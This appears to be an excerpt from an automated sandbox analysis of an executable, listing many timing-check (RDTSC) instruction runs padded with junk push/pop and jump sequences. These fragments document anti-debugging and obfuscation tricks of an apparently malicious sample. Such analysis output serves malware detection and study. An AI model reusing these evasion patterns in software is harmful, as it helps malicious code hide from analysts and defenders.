Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E931 second address: 51E935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E935 second address: 51E951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128EFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F075D128EF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E951 second address: 51E955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E955 second address: 51E966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F075D128EFBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E966 second address: 51E96D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EAAA second address: 51EAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F075D128F01h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EAC2 second address: 51EACE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F075CBABEC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EACE second address: 51EADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F075D128EFAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EADE second address: 51EAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1A7 second address: 51F1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F075D128EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1B1 second address: 51F1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F075CBABECDh 0x0000000d jmp 00007F075CBABED3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1D9 second address: 51F1EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 jnc 00007F075D128EF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1EE second address: 51F214 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F075CBABECBh 0x0000000a pop esi 0x0000000b jbe 00007F075CBABECAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jl 00007F075CBABED2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F214 second address: 51F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F505 second address: 51F50C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F50C second address: 51F528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F075D128F00h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F528 second address: 51F536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnl 00007F075CBABEC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F536 second address: 51F53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51FAD4 second address: 51FB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F075CBABECDh 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F075CBABEC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F075CBABED8h 0x00000019 jno 00007F075CBABEC6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5204E4 second address: 5204E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5204E9 second address: 520503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F075CBABEC6h 0x0000000a popad 0x0000000b push ecx 0x0000000c jg 00007F075CBABEC6h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520503 second address: 520507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520507 second address: 52050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5239C2 second address: 5239C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5239C8 second address: 5239CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 523B4C second address: 523B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 523D8D second address: 523DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F075CBABECAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 524DE6 second address: 524E02 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F075D128F07h 0x00000008 jmp 00007F075D128F01h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EDB5E second address: 4EDB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EDB62 second address: 4EDB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CFCB second address: 52CFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CFCF second address: 52CFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1DBA second address: 4E1DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F075CBABED7h 0x0000000a pop edi 0x0000000b js 00007F075CBABEEDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C428 second address: 52C43B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C43B second address: 52C43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CAF2 second address: 52CB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F075D128EF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CB03 second address: 52CB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CB09 second address: 52CB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CCA3 second address: 52CCA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CCA8 second address: 52CCAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CCAE second address: 52CCB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CE19 second address: 52CE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CE1D second address: 52CE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F18E second address: 52F195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F500 second address: 52F514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FAA0 second address: 52FAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FAA4 second address: 52FAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F075CBABECDh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e xor edi, dword ptr [ebp+122D2661h] 0x00000014 movsx edi, si 0x00000017 push eax 0x00000018 pushad 0x00000019 jnc 00007F075CBABEC8h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FB94 second address: 52FBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F03h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FD0B second address: 52FD40 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075CBABED2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F075CBABED5h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE61 second address: 52FE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE65 second address: 52FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE6B second address: 52FE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE71 second address: 52FE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300F5 second address: 5300FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300FB second address: 530116 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F075CBABEC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D35FEh] 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 530116 second address: 53011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53011A second address: 530144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F075CBABECEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53070B second address: 530711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531138 second address: 531185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABECFh 0x00000008 jl 00007F075CBABEC6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 sub edi, 36B458A0h 0x00000018 push 00000000h 0x0000001a mov esi, dword ptr [ebp+122D28E6h] 0x00000020 push 00000000h 0x00000022 movzx edi, ax 0x00000025 push esi 0x00000026 mov dword ptr [ebp+122D1CCFh], edi 0x0000002c pop edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F075CBABED3h 0x00000036 jmp 00007F075CBABECDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531185 second address: 53118B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5322D8 second address: 5322DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5338EC second address: 5338F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534382 second address: 534390 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534390 second address: 534394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534394 second address: 5343AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F075CBABECCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5343AA second address: 5343AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534DBD second address: 534DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534DC7 second address: 534DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534DCD second address: 534E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D239Fh], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F075CBABEC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F075CBABEC8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 jnl 00007F075CBABECCh 0x0000004d mov edi, dword ptr [ebp+122D38FEh] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 jnp 00007F075CBABEC6h 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534E41 second address: 534E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384BD second address: 5384C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384C1 second address: 5384C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384C7 second address: 5384CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384CD second address: 5384D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A279 second address: 53A27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B24B second address: 53B255 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F075D128EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A471 second address: 53A476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A476 second address: 53A47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A47B second address: 53A481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C278 second address: 53C27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B3FA second address: 53B425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075CBABED7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D205 second address: 53D20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D20B second address: 53D20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D20F second address: 53D224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007F075D128EF6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53E267 second address: 53E26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53E26D second address: 53E271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 540104 second address: 540108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 540108 second address: 54010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F453 second address: 53F477 instructions: 0x00000000 rdtsc 0x00000002 js 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F075CBABED6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54010E second address: 540188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F075D128EF8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 or ebx, dword ptr [ebp+12482338h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F075D128EF8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jmp 00007F075D128F00h 0x0000004f mov ebx, edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pushad 0x00000056 popad 0x00000057 pop esi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F477 second address: 53F47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F47D second address: 53F481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F481 second address: 53F485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 543FBD second address: 543FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F05h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 543FD6 second address: 543FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 543FE2 second address: 543FFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 jl 00007F075D128EF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5445F9 second address: 5445FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541121 second address: 541133 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F075D128EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5422AA second address: 5422B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5422B0 second address: 5422B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5422B5 second address: 5422BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F075CBABEC6h 0x0000000a rdtsc
